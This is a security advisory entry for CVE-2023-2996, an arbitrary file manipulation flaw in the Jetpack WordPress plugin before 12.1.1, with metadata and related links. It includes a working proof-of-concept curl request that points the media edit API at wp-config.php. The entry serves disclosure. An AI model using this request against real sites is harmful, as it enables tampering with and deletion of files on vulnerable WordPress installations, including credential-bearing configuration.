Lucene search
WPScanWPEX-ID:52D221BD-AE42-435D-A90A-60A5AE530663HistoryMay 30, 2023 - 12:00 a.m.
Jetpack < 12.1.1 - Author+ Arbitrary File Manipulation via API
2023-05-3000:00:00
WPScan
146
jetpack
arbitrary file manipulation
api
wordpress
curl
security exploit
blog id
0.003 Low
EPSS
Percentile
70.8%
The plugin does not validate uploaded files, allowing users with author roles or above to manipulate existing files on the site, deleting arbitrary files, and in rare cases achieve Remote Code Execution via phar deserialization.
curl --json '{ "media": {"tmp_name": "/WP_CONTENT_PATH/wp-config.php", "name": "test.txt"} }' https://public-api.wordpress.com/rest/v1.2/sites/BLOG_ID/media/1/edit
Where BLOG_ID is the site Jetpack blog id.
Related
nvd
nvd
CVE-2023-2996
2023-06-27 14:15:11
cve
cve
CVE-2023-2996
2023-06-27 14:15:11
osv
osv
CVE-2023-2996
2023-06-27 14:15:11
openvas
openvas
wpvulndb
wpvulndb
Jetpack < 12.1.1 - Author+ Arbitrary File Manipulation via API
2023-05-30 00:00:00
prion
prion
Deserialization of untrusted data
2023-06-27 14:15:00
cvelist
cvelist
CVE-2023-2996 Jetpack < 12.1.1 - Author+ Arbitrary File Manipulation via API
2023-06-27 13:17:07
wordfence
wordfence